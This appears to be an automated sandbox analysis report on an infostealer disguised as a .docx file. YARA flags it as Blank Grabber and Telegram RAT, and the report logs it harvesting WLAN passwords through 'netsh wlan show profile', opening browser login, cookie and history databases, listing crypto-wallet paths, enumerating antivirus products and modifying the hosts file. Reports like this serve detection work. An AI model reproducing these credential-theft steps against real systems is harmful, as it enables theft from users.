Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF69436D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

16_2_00007FF69436D080

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF694385EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

16_2_00007FF694385EEC

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Code function: 0_2_0040559A GetVersionExW,GetVersionExW,

0_2_0040559A

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chost.exe PID: 4336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: chost.exe, 00000011.00000002.2376637980.0000016E184EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
